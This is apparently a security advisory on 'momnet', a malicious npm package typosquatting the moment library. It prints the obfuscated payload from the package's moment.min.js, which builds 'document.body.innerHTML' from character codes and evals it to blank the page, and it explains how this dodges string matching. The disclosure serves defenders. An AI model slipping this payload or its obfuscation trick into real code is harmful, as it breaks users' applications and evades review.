Malicious Package Affecting momnet package, versions *
Threat Intelligence
Exploit Maturity: Mature
- Snyk ID SNYK-JS-MOMNET-2324797
- published 23 Dec 2021
- disclosed 15 Dec 2021
- credit Ophir Pickman
How to fix?
Do not install momnet, and remove it from any project where it already appears (package.json, lockfiles and node_modules). Use the legitimate moment package instead. There is no safe release of momnet, which is why this advisory covers versions *.
Overview
momnet is a malicious package that typosquats the popular moment library, which is used to parse, format and display timestamps across time zones in front-end projects.
The malicious package is almost identical to the original library. The only difference is that it ships a crafted moment.min.js of unknown origin in place of the library's own build; that file carries the payload shown below.
Malicious Code
function anonymous() {
  // Each variable holds one ASCII code; the arbitrary names hide which string it belongs to.
  var a = 100,  // 'd'
    b = 111,    // 'o'
    c = 99,     // 'c'
    d = 117,    // 'u'
    e = 109,    // 'm'
    f = 101,    // 'e'
    g = 110,    // 'n'
    h = 116,    // 't'
    k = 98,     // 'b'
    l = 121,    // 'y'
    z = 105,    // 'i'
    x = 114,    // 'r'
    v = 72,     // 'H'
    n = 84,     // 'T'
    w = 77,     // 'M'
    q = 76,     // 'L'
    // reducer: append one character per ASCII code
    to = (e, t) => e + String.fromCharCode(t),
    j = [a, b, c, d, e, f, g, h].reduce(to, ""),    // "document"
    p = [k, b, a, l].reduce(to, ""),                // "body"
    r = [z, g, g, f, x, v, n, w, q].reduce(to, ""); // "innerHTML"
  (() => {
    // evaluates: document.body.innerHTML = ''
    eval(`${j}.${p}.${r} = ''`);
  })();
}
When the function runs, the eval executes document.body.innerHTML = '', which empties the page body. Everything the application had rendered disappears, and any script that subsequently looks up elements inside the body fails, so the application is effectively dead. Assembling the property path from character codes keeps the literal string document.body.innerHTML out of the file, which defeats simple string matching on the minified bundle.